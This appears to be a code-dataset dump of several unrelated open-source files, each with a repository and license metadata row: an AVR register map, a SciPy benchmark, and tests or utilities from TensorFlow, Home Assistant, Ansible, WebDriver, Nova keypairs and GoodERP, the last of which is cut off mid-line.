'OCR2RBL': '$F8',
'OCR2SAH': '$F3',
'OCR2SAL': '$F2',
'OCR2SBH': '$F7',
'OCR2SBL': '$F6',
'PCNF2': '$FA',
'PCTL2': '$FB',
'PFRC2A': '$FC',
'PFRC2B': '$FD',
'PICR2H': '$FF',
'PICR2L': '$FE',
'PIFR2': '$A4',
'PIM2': '$A5',
'POM2': '$F1',
'PSOC2': '$F0',
'SPCR': '$4C',
'SPDR': '$4E',
'SPSR': '$4D',
'GTCCR': '$43',
'OCR0A': '$47',
'OCR0B': '$48',
'TCCR0A': '$44',
'TCCR0B': '$45',
'TCNT0': '$46',
'TIFR0': '$35',
'TIMSK0': '$6E',
'ICR1H': '$87',
'ICR1L': '$86',
'OCR1AH': '$89',
'OCR1AL': '$88',
'OCR1BH': '$8B',
'OCR1BL': '$8A',
'TCCR1A': '$80',
'TCCR1B': '$81',
'TCCR1C': '$82',
'TCNT1H': '$85',
'TCNT1L': '$84',
'TIFR1': '$36',
'TIMSK1': '$6F',
'UBRRH': '$C5',
'UBRRL': '$C4',
'UCSRA': '$C0',
'UCSRB': '$C1',
'UCSRC': '$C2',
'UDR': '$C6',
'WDTCSR': '$60',
'PSC2_CAPTAddr': '$0001',
'PSC2_ECAddr': '$0002',
'PSC1_CAPTAddr': '$0003',
'PSC1_ECAddr': '$0004',
'PSC0_CAPTAddr': '$0005',
'PSC0_ECAddr': '$0006',
'ANALOG_COMP_0Addr': '$0007',
'ANALOG_COMP_1Addr': '$0008',
'ANALOG_COMP_2Addr': '$0009',
'INT0Addr': '$000A',
'TIMER1_CAPTAddr': '$000B',
'TIMER1_COMPAAddr': '$000C',
'TIMER1_COMPBAddr': '$000D',
'RESERVED15Addr': '$000E',
'TIMER1_OVFAddr': '$000F',
'TIMER0_COMP_AAddr': '$0010',
'TIMER0_OVFAddr': '$0011',
'ADCAddr': '$0012',
'INT1Addr': '$0013',
'SPI_STCAddr': '$0014',
'USART_RXAddr': '$0015',
'USART_UDREAddr': '$0016',
'USART_TXAddr': '$0017',
'INT2Addr': '$0018',
'WDTAddr': '$0019',
'EE_READYAddr': '$001A',
'TIMER0_COMPBAddr': '$001B',
'INT3Addr': '$001C',
'RESERVED30Addr': '$001D',
'RESERVED31Addr': '$001E',
'SPM_READYAddr': '$001F'
} | gpl-2.0 | 3,740,517,594,388,612,600 | 18.291429 | 51 | 0.480296 | false |
Eric89GXL/scipy | benchmarks/benchmarks/cython_special.py | 10 | 2044 | from __future__ import division, absolute_import, print_function
import re
import six
import numpy as np
from scipy import special
try:
from scipy.special import cython_special
except ImportError:
pass
from .common import with_attributes
FUNC_ARGS = {
'airy_d': (1,),
'airy_D': (1,),
'beta_dd': (0.25, 0.75),
'erf_d': (1,),
'erf_D': (1+1j,),
'exprel_d': (1e-6,),
'gamma_d': (100,),
'gamma_D': (100+100j,),
'jv_dd': (1, 1),
'jv_dD': (1, (1+1j)),
'loggamma_D': (20,),
'logit_d': (0.5,),
'psi_d': (1,),
'psi_D': (1,),
}
class _CythonSpecialMeta(type):
"""
Add time_* benchmarks corresponding to cython_special._bench_*_cy
"""
def __new__(cls, cls_name, bases, dct):
params = [(10, 100, 1000), ('python', 'numpy', 'cython')]
param_names = ['N', 'api']
def get_time_func(name, args):
@with_attributes(params=[(name,), (args,)] + params,
param_names=['name', 'argument'] + param_names)
def func(self, name, args, N, api):
if api == 'python':
self.py_func(N, *args)
elif api == 'numpy':
self.np_func(*self.obj)
else:
self.cy_func(N, *args)
func.__name__ = 'time_' + name
return func
for name in FUNC_ARGS.keys():
func = get_time_func(name, FUNC_ARGS[name])
dct[func.__name__] = func
return type.__new__(cls, cls_name, bases, dct)
class CythonSpecial(six.with_metaclass(_CythonSpecialMeta)):
def setup(self, name, args, N, api):
self.py_func = getattr(cython_special, '_bench_{}_py'.format(name))
self.cy_func = getattr(cython_special, '_bench_{}_cy'.format(name))
m = re.match('^(.*)_[dDl]+$', name)
self.np_func = getattr(special, m.group(1))
self.obj = []
for arg in args:
self.obj.append(arg*np.ones(N))
self.obj = tuple(self.obj)
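# Illustrative note (assumptions about airspeed-velocity usage, not from the
# original file): the metaclass stamps one timing method per FUNC_ARGS entry
# onto this class, so a benchmark can also be driven by hand, e.g.
#
#     bench = CythonSpecial()
#     bench.setup('erf_d', (1,), 1000, 'cython')
#     bench.time_erf_d('erf_d', (1,), 1000, 'cython')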
| bsd-3-clause | -2,457,090,697,009,167,400 | 26.253333 | 76 | 0.511742 | false |
ageron/tensorflow | tensorflow/python/autograph/converters/call_trees_test.py | 3 | 3849 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for call_trees module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.converters import call_trees
from tensorflow.python.autograph.core import converter_testing
from tensorflow.python.platform import test
class CallTreesTest(converter_testing.TestCase):
def test_normal_function(self):
def test_fn(f):
return f() + 3
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 3)
self.assertListEqual(self.dynamic_calls, [((), {})])
def test_function_with_kwarg(self):
def test_fn(f, a, b):
return f(a, c=b) + 3
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None, 1, 2),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 3)
self.assertListEqual(self.dynamic_calls, [((1,), {'c': 2})])
def test_function_with_kwargs_starargs(self):
def test_fn(f, a, *args, **kwargs):
return f(a, *args, **kwargs) + 5
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None, 1, *[2, 3], **{'b': 4, 'c': 5}),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 5)
self.assertListEqual(self.dynamic_calls, [((1, 2, 3), {'b': 4, 'c': 5})])
def test_function_with_kwargs_starargs_only(self):
def f(*unused_args): # Will not be called.
pass
def test_fn():
args = [1, 2, 3]
return f(*args) + 11
with self.converted(test_fn, call_trees, {'f': f}) as result:
self.assertEquals(
result.test_fn(),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 11)
self.assertListEqual(self.dynamic_calls, [((1, 2, 3), {})])
def test_function_with_kwargs_keywords(self):
def test_fn(f, a, b, **kwargs):
return f(a, b=b, **kwargs) + 5
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None, 1, 2, **{'c': 3}),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 5)
self.assertListEqual(self.dynamic_calls, [((1,), {'b': 2, 'c': 3})])
def test_class_method(self):
class TestClass(object):
def test_method(self, a):
return self.other_method(a) + 1
tc = TestClass()
with self.converted(TestClass.test_method, call_trees, {}) as result:
self.assertEquals(converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 1,
result.test_method(tc, 1))
self.assertListEqual(self.dynamic_calls, [((1,), {})])
def test_object_method(self):
class TestClass(object):
def test_method(self, a):
return self.other_method(a) + 1
tc = TestClass()
with self.converted(tc.test_method, call_trees, {}) as result:
self.assertEquals(converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 1,
result.test_method(tc, 1))
self.assertListEqual(self.dynamic_calls, [((1,), {})])
if __name__ == '__main__':
test.main()
| apache-2.0 | -6,032,432,939,588,114,000 | 32.469565 | 80 | 0.627176 | false |
robbiet480/home-assistant | tests/util/test_pressure.py | 23 | 2247 | """Test Home Assistant pressure utility functions."""
import pytest
from homeassistant.const import (
PRESSURE_HPA,
PRESSURE_INHG,
PRESSURE_MBAR,
PRESSURE_PA,
PRESSURE_PSI,
)
import homeassistant.util.pressure as pressure_util
INVALID_SYMBOL = "bob"
VALID_SYMBOL = PRESSURE_PA
def test_convert_same_unit():
"""Test conversion from any unit to same unit."""
assert pressure_util.convert(2, PRESSURE_PA, PRESSURE_PA) == 2
assert pressure_util.convert(3, PRESSURE_HPA, PRESSURE_HPA) == 3
assert pressure_util.convert(4, PRESSURE_MBAR, PRESSURE_MBAR) == 4
assert pressure_util.convert(5, PRESSURE_INHG, PRESSURE_INHG) == 5
def test_convert_invalid_unit():
"""Test exception is thrown for invalid units."""
with pytest.raises(ValueError):
pressure_util.convert(5, INVALID_SYMBOL, VALID_SYMBOL)
with pytest.raises(ValueError):
pressure_util.convert(5, VALID_SYMBOL, INVALID_SYMBOL)
def test_convert_nonnumeric_value():
"""Test exception is thrown for nonnumeric type."""
with pytest.raises(TypeError):
pressure_util.convert("a", PRESSURE_HPA, PRESSURE_INHG)
def test_convert_from_hpascals():
"""Test conversion from hPA to other units."""
hpascals = 1000
assert pressure_util.convert(hpascals, PRESSURE_HPA, PRESSURE_PSI) == pytest.approx(
14.5037743897
)
assert pressure_util.convert(
hpascals, PRESSURE_HPA, PRESSURE_INHG
) == pytest.approx(29.5299801647)
assert pressure_util.convert(hpascals, PRESSURE_HPA, PRESSURE_PA) == pytest.approx(
100000
)
assert pressure_util.convert(
hpascals, PRESSURE_HPA, PRESSURE_MBAR
) == pytest.approx(1000)
def test_convert_from_inhg():
"""Test conversion from inHg to other units."""
inhg = 30
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_PSI) == pytest.approx(
14.7346266155
)
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_HPA) == pytest.approx(
1015.9167
)
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_PA) == pytest.approx(
101591.67
)
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_MBAR) == pytest.approx(
1015.9167
)
| apache-2.0 | 1,754,149,167,649,640,400 | 30.647887 | 88 | 0.684468 | false |
michael-dev2rights/ansible | lib/ansible/module_utils/aws/rds.py | 1 | 4179 | # -*- coding: utf-8 -*-
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Author: Michael De La Rue 2017 largely rewritten but based on work
# by Will Thames taken in turn from the original rds module.
try:
import botocore
from botocore import xform_name
except ImportError:
pass # it is assumed that calling modules will detect and provide an appropriate nice error.
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
DEFAULT_PORTS = {
'aurora': 3306,
'mariadb': 3306,
'mysql': 3306,
'oracle': 1521,
'sqlserver': 1433,
'postgres': 5432,
}
DB_ENGINES = [
'MySQL',
'aurora',
'mariadb',
'oracle-ee',
'oracle-se',
'oracle-se1',
'oracle-se2',
'postgres',
'sqlserver-ee',
'sqlserver-ex',
'sqlserver-se',
'sqlserver-web',
]
LICENSE_MODELS = [
'bring-your-own-license',
'general-public-license',
'license-included',
'postgresql-license'
]
def get_db_instance(conn, instancename):
try:
response = conn.describe_db_instances(DBInstanceIdentifier=instancename)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'DBInstanceNotFound':
return None
else:
raise
return response['DBInstances'][0]
def instance_to_facts(instance):
assert 'DBInstanceIdentifier' in instance, "instance argument was not a valid instance"
d = camel_dict_to_snake_dict(instance)
return d
def get_snapshot(conn, snapshotid):
try:
response = conn.describe_db_snapshots(DBSnapshotIdentifier=snapshotid)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'DBSnapshotNotFound':
return None
else:
raise
return response['DBSnapshots'][0]
def snapshot_to_facts(snapshot):
assert 'DBSnapshotIdentifier' in snapshot, "snapshot argument was not a valid snapshot"
d = camel_dict_to_snake_dict(snapshot)
return d
def instance_facts_diff(state_a, state_b):
"""compare two fact dictionaries for rds instances
This function takes two dictionaries of facts related to an RDS
and compares them intelligently generating only the differences
which ansible controls. If nothing has changed then the
difference should be an empty dictionary which can be treated as
False
The function aims to work with both instance states and a set of
module parameters. It will select those parameters that could be
used in a create call.
The second dict is assumed to represent a target state and so if
parameters are missing they will not be considered to show a
difference.
"""
# FIXME: testing of deletion of parameters needs to be tested
# properly.
# FIXME: can we use a static / test session rather than us-west-2.
session = botocore.session.get_session()
conn = session.create_client('rds', region_name='us-west-2')
operations_model = conn._service_model.operation_model("CreateDBInstance")
compare_keys = [xform_name(x) for x in operations_model.input_shape.members.keys()]
leave_if_null = ['maintenance_window', 'backup_retention']
remove_if_null = []
before = dict()
after = dict()
try:
old_port = state_a.get("endpoint").get("port")
except AttributeError:
old_port = None
if old_port is not None:
state_a["port"]=old_port
try:
new_port = state_b.get("endpoint").get("port")
except AttributeError:
new_port = None
if new_port is not None:
state_b["port"]=new_port
for k in compare_keys:
if state_a.get(k) != state_b.get(k):
            if state_b.get(k) is None and k not in remove_if_null:
pass
else:
before[k] = state_a.get(k)
after[k] = state_b.get(k)
result = dict()
if before:
result = dict(before_header=state_a.get('instance_id'), before=before, after=after)
result['after_header'] = state_b.get('instance_id', state_a.get('instance_id'))
return result
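# Illustrative sketch only (hypothetical values, not from the original file):
# comparing current instance facts against the desired module parameters
# yields an ansible-style diff dict, or an empty dict when nothing that
# ansible controls has changed:
#
#     current = {'instance_id': 'db1', 'port': 3306, 'engine': 'mysql'}
#     desired = {'instance_id': 'db1', 'port': 5432, 'engine': 'mysql'}
#     instance_facts_diff(current, desired)
#     # -> {'before_header': 'db1', 'before': {'port': 3306},
#     #     'after': {'port': 5432}, 'after_header': 'db1'}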
| gpl-3.0 | -411,790,850,942,582,100 | 28.020833 | 97 | 0.65207 | false |
asajeffrey/servo | tests/wpt/web-platform-tests/webdriver/tests/perform_actions/key_special_keys.py | 41 | 1118 | import pytest
from webdriver import error
from tests.perform_actions.support.refine import get_keys
@pytest.mark.parametrize("value", [
(u"\U0001F604"),
(u"\U0001F60D"),
(u"\u0BA8\u0BBF"),
(u"\u1100\u1161\u11A8"),
])
def test_codepoint_keys_behave_correctly(session, key_reporter, key_chain, value):
# Not using key_chain.send_keys() because we always want to treat value as
# one character here. `len(value)` varies by platform for non-BMP characters,
# so we don't want to iterate over value.
key_chain \
.key_down(value) \
.key_up(value) \
.perform()
# events sent by major browsers are inconsistent so only check key value
assert get_keys(key_reporter) == value
@pytest.mark.parametrize("value", [
(u"fa"),
(u"\u0BA8\u0BBFb"),
(u"\u0BA8\u0BBF\u0BA8"),
(u"\u1100\u1161\u11A8c")
])
def test_invalid_multiple_codepoint_keys_fail(session, key_reporter, key_chain, value):
with pytest.raises(error.InvalidArgumentException):
key_chain \
.key_down(value) \
.key_up(value) \
.perform()
| mpl-2.0 | -1,711,500,888,662,174,000 | 28.421053 | 87 | 0.644902 | false |
DirectXMan12/nova-hacking | nova/tests/api/openstack/compute/contrib/test_keypairs.py | 1 | 15700 | # Copyright 2011 Eldar Nugaev
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import webob
from nova.api.openstack.compute.contrib import keypairs
from nova.api.openstack import wsgi
from nova import db
from nova import exception
from nova.openstack.common import jsonutils
from nova import quota
from nova import test
from nova.tests.api.openstack import fakes
QUOTAS = quota.QUOTAS
def fake_keypair(name):
return {'public_key': 'FAKE_KEY',
'fingerprint': 'FAKE_FINGERPRINT',
'name': name}
def db_key_pair_get_all_by_user(self, user_id):
return [fake_keypair('FAKE')]
def db_key_pair_create(self, keypair):
return keypair
def db_key_pair_destroy(context, user_id, name):
if not (user_id and name):
raise Exception()
def db_key_pair_create_duplicate(context, keypair):
raise exception.KeyPairExists(key_name=keypair.get('name', ''))
class KeypairsTest(test.TestCase):
def setUp(self):
super(KeypairsTest, self).setUp()
self.Controller = keypairs.Controller()
fakes.stub_out_networking(self.stubs)
fakes.stub_out_rate_limiting(self.stubs)
self.stubs.Set(db, "key_pair_get_all_by_user",
db_key_pair_get_all_by_user)
self.stubs.Set(db, "key_pair_create",
db_key_pair_create)
self.stubs.Set(db, "key_pair_destroy",
db_key_pair_destroy)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Keypairs'])
self.app = fakes.wsgi_app(init_only=('os-keypairs',))
def test_keypair_list(self):
req = webob.Request.blank('/v2/fake/os-keypairs')
res = req.get_response(self.app)
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
response = {'keypairs': [{'keypair': fake_keypair('FAKE')}]}
self.assertEqual(res_dict, response)
def test_keypair_create(self):
body = {'keypair': {'name': 'create_test'}}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
self.assertTrue(len(res_dict['keypair']['fingerprint']) > 0)
self.assertTrue(len(res_dict['keypair']['private_key']) > 0)
def test_keypair_create_with_empty_name(self):
body = {'keypair': {'name': ''}}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
'Keypair name must be between 1 and 255 characters long',
res_dict['badRequest']['message'])
def test_keypair_create_with_name_too_long(self):
body = {
'keypair': {
'name': 'a' * 256
}
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
'Keypair name must be between 1 and 255 characters long',
res_dict['badRequest']['message'])
def test_keypair_create_with_non_alphanumeric_name(self):
body = {
'keypair': {
'name': 'test/keypair'
}
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
res_dict = jsonutils.loads(res.body)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Keypair name contains unsafe characters",
res_dict['badRequest']['message'])
def test_keypair_import(self):
body = {
'keypair': {
'name': 'create_test',
'public_key': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBYIznA'
'x9D7118Q1VKGpXy2HDiKyUTM8XcUuhQpo0srqb9rboUp4'
'a9NmCwpWpeElDLuva707GOUnfaBAvHBwsRXyxHJjRaI6Y'
'Qj2oLJwqvaSaWUbyT1vtryRqy6J3TecN0WINY71f4uymi'
'MZP0wby4bKBcYnac8KiCIlvkEl0ETjkOGUq8OyWRmn7lj'
'j5SESEUdBP0JnuTFKddWTU/wD6wydeJaUhBTqOlHn0kX1'
'GyqoNTE1UEhcM5ZRWgfUZfTjVyDF2kGj3vJLCJtJ8LoGc'
'j7YaN4uPg1rBle+izwE/tLonRrds+cev8p6krSSrxWOwB'
'bHkXa6OciiJDvkRzJXzf',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 200)
        # FIXME(ja): should we check that public_key was sent to create?
res_dict = jsonutils.loads(res.body)
self.assertTrue(len(res_dict['keypair']['fingerprint']) > 0)
self.assertFalse('private_key' in res_dict['keypair'])
def test_keypair_import_quota_limit(self):
def fake_quotas_count(self, context, resource, *args, **kwargs):
return 100
self.stubs.Set(QUOTAS, "count", fake_quotas_count)
body = {
'keypair': {
'name': 'create_test',
'public_key': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBYIznA'
'x9D7118Q1VKGpXy2HDiKyUTM8XcUuhQpo0srqb9rboUp4'
'a9NmCwpWpeElDLuva707GOUnfaBAvHBwsRXyxHJjRaI6Y'
'Qj2oLJwqvaSaWUbyT1vtryRqy6J3TecN0WINY71f4uymi'
'MZP0wby4bKBcYnac8KiCIlvkEl0ETjkOGUq8OyWRmn7lj'
'j5SESEUdBP0JnuTFKddWTU/wD6wydeJaUhBTqOlHn0kX1'
'GyqoNTE1UEhcM5ZRWgfUZfTjVyDF2kGj3vJLCJtJ8LoGc'
'j7YaN4uPg1rBle+izwE/tLonRrds+cev8p6krSSrxWOwB'
'bHkXa6OciiJDvkRzJXzf',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 413)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Quota exceeded, too many key pairs.",
res_dict['overLimit']['message'])
def test_keypair_create_quota_limit(self):
def fake_quotas_count(self, context, resource, *args, **kwargs):
return 100
self.stubs.Set(QUOTAS, "count", fake_quotas_count)
body = {
'keypair': {
'name': 'create_test',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 413)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Quota exceeded, too many key pairs.",
res_dict['overLimit']['message'])
def test_keypair_create_duplicate(self):
self.stubs.Set(db, "key_pair_create", db_key_pair_create_duplicate)
body = {'keypair': {'name': 'create_duplicate'}}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 409)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Key pair 'create_duplicate' already exists.",
res_dict['conflictingRequest']['message'])
def test_keypair_import_bad_key(self):
body = {
'keypair': {
'name': 'create_test',
'public_key': 'ssh-what negative',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual("Keypair data is invalid",
res_dict['badRequest']['message'])
def test_keypair_delete(self):
req = webob.Request.blank('/v2/fake/os-keypairs/FAKE')
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 202)
def test_keypair_get_keypair_not_found(self):
req = webob.Request.blank('/v2/fake/os-keypairs/DOESNOTEXIST')
res = req.get_response(self.app)
self.assertEqual(res.status_int, 404)
def test_keypair_delete_not_found(self):
def db_key_pair_get_not_found(context, user_id, name):
raise exception.KeypairNotFound(user_id=user_id, name=name)
self.stubs.Set(db, "key_pair_get",
db_key_pair_get_not_found)
req = webob.Request.blank('/v2/fake/os-keypairs/WHAT')
res = req.get_response(self.app)
self.assertEqual(res.status_int, 404)
def test_keypair_show(self):
def _db_key_pair_get(context, user_id, name):
return {'name': 'foo', 'public_key': 'XXX', 'fingerprint': 'YYY'}
self.stubs.Set(db, "key_pair_get", _db_key_pair_get)
req = webob.Request.blank('/v2/fake/os-keypairs/FAKE')
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
res_dict = jsonutils.loads(res.body)
self.assertEqual(res.status_int, 200)
self.assertEqual('foo', res_dict['keypair']['name'])
self.assertEqual('XXX', res_dict['keypair']['public_key'])
self.assertEqual('YYY', res_dict['keypair']['fingerprint'])
def test_keypair_show_not_found(self):
def _db_key_pair_get(context, user_id, name):
raise exception.KeypairNotFound(user_id=user_id, name=name)
self.stubs.Set(db, "key_pair_get", _db_key_pair_get)
req = webob.Request.blank('/v2/fake/os-keypairs/FAKE')
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 404)
def test_show_server(self):
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get())
req = webob.Request.blank('/v2/fake/servers/1')
req.headers['Content-Type'] = 'application/json'
response = req.get_response(fakes.wsgi_app(init_only=('servers',)))
self.assertEquals(response.status_int, 200)
res_dict = jsonutils.loads(response.body)
self.assertTrue('key_name' in res_dict['server'])
self.assertEquals(res_dict['server']['key_name'], '')
def test_detail_servers(self):
self.stubs.Set(db, 'instance_get_all_by_filters',
fakes.fake_instance_get_all_by_filters())
req = fakes.HTTPRequest.blank('/v2/fake/servers/detail')
res = req.get_response(fakes.wsgi_app(init_only=('servers',)))
server_dicts = jsonutils.loads(res.body)['servers']
self.assertEquals(len(server_dicts), 5)
for server_dict in server_dicts:
self.assertTrue('key_name' in server_dict)
self.assertEquals(server_dict['key_name'], '')
def test_keypair_create_with_invalid_keypair_body(self):
body = {'alpha': {'name': 'create_test'}}
req = webob.Request.blank('/v1.1/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
res_dict = jsonutils.loads(res.body)
self.assertEqual(res.status_int, 400)
self.assertEqual(res_dict['badRequest']['message'],
"Invalid request body")
class KeypairsXMLSerializerTest(test.TestCase):
def setUp(self):
super(KeypairsXMLSerializerTest, self).setUp()
self.deserializer = wsgi.XMLDeserializer()
def test_default_serializer(self):
exemplar = dict(keypair=dict(
public_key='fake_public_key',
private_key='fake_private_key',
fingerprint='fake_fingerprint',
user_id='fake_user_id',
name='fake_key_name'))
serializer = keypairs.KeypairTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('keypair', tree.tag)
for child in tree:
self.assertTrue(child.tag in exemplar['keypair'])
self.assertEqual(child.text, exemplar['keypair'][child.tag])
def test_index_serializer(self):
exemplar = dict(keypairs=[
dict(keypair=dict(
name='key1_name',
public_key='key1_key',
fingerprint='key1_fingerprint')),
dict(keypair=dict(
name='key2_name',
public_key='key2_key',
fingerprint='key2_fingerprint'))])
serializer = keypairs.KeypairsTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('keypairs', tree.tag)
self.assertEqual(len(exemplar['keypairs']), len(tree))
for idx, keypair in enumerate(tree):
self.assertEqual('keypair', keypair.tag)
kp_data = exemplar['keypairs'][idx]['keypair']
for child in keypair:
self.assertTrue(child.tag in kp_data)
self.assertEqual(child.text, kp_data[child.tag])
def test_deserializer(self):
exemplar = dict(keypair=dict(
name='key_name',
public_key='public_key'))
intext = ("<?xml version='1.0' encoding='UTF-8'?>\n"
'<keypair><name>key_name</name>'
'<public_key>public_key</public_key></keypair>')
result = self.deserializer.deserialize(intext)['body']
self.assertEqual(result, exemplar)
| apache-2.0 | -7,950,758,879,303,486,000 | 37.861386 | 78 | 0.589682 | false |
floraXiao/gooderp_addons | buy/tests/test_supplier_statements.py | 6 | 4741 | # -*- coding: utf-8 -*-
from odoo.tests.common import TransactionCase
from odoo.exceptions import UserError
class TestSupplierStatements(TransactionCase):
    '''Test supplier statements'''
def setUp(self):
        '''Supplier statements wizard and data'''
super(TestSupplierStatements, self).setUp()
        # Partner statements wizard: else self._context.get('default_supplier')
objStatements = self.env['partner.statements.report.wizard']
self.statement = objStatements.create({
'partner_id': self.env.ref('core.lenovo').id,
'from_date': '2016-01-01',
'to_date': '2016-11-01'}).with_context({'default_supplier': True})
        # Supplier opening balance; viewing the source documents should raise an error
self.env.ref('core.lenovo').payable_init = 1000
partner = self.env['partner'].search(
[('id', '=', self.env.ref('core.lenovo').id)])
        # Create payment records
money_get = self.env.ref('money.get_40000')
money_get.money_order_done()
money_order = self.env.ref('money.pay_2000')
money_order.money_order_done()
        # Set an account for the category of the goods "keyboard" in buy_order_1
self.env.ref('core.goods_category_1').account_id = self.env.ref(
'finance.account_goods').id
        # Create a purchase receipt record
buy_order = self.env.ref('buy.buy_order_1')
buy_order.bank_account_id = False
buy_order.buy_order_done()
objReceipt = self.env['buy.receipt']
receipt = objReceipt.search([('order_id', '=', buy_order.id)])
receipt.buy_receipt_done()
        # Create a purchase return record
buy_return = self.env.ref('buy.buy_return_order_1')
buy_return.bank_account_id = False
buy_return.buy_order_done()
receipt_return = objReceipt.search([('order_id', '=', buy_return.id)])
receipt_return.buy_receipt_done()
def test_supplier_statements_wizard(self):
        '''Supplier statements wizard'''
        # Test 'The end date cannot be earlier than the start date!'
self.statement.from_date = '2016-11-03'
with self.assertRaises(UserError):
self.statement.partner_statements_without_goods()
with self.assertRaises(UserError):
self.statement.partner_statements_with_goods()
        # Test whether the default value of from_date is the company start date
objStatements = self.env['partner.statements.report.wizard']
statement_date = objStatements.create({
'partner_id': self.env.ref('core.lenovo').id,
'to_date': '2016-11-03'}).with_context({'default_supplier': True})
self.assertEqual(
statement_date.from_date,
self.env.user.company_id.start_date
)
def test_supplier_statements_find_source(self):
        '''View supplier statement details'''
        # View source orders without goods details
self.statement.partner_statements_without_goods()
supplier_statement = self.env['supplier.statements.report'].search([])
supplier_statement_init = self.env['supplier.statements.report'].search([('move_id', '=', False),
('amount', '!=', 0)])
        # If the statement row is the opening balance, clicking the view button should raise an error
with self.assertRaises(UserError):
supplier_statement_init.find_source_order()
for report in list(set(supplier_statement) - set(supplier_statement_init)):
report.find_source_order()
        # View source orders with goods details
self.statement.partner_statements_with_goods()
objGoods = self.env['supplier.statements.report.with.goods']
supplier_statement_goods = objGoods.search([('name', '!=', False)])
supplier_statement_goods_init = objGoods.search([('move_id', '=', False),
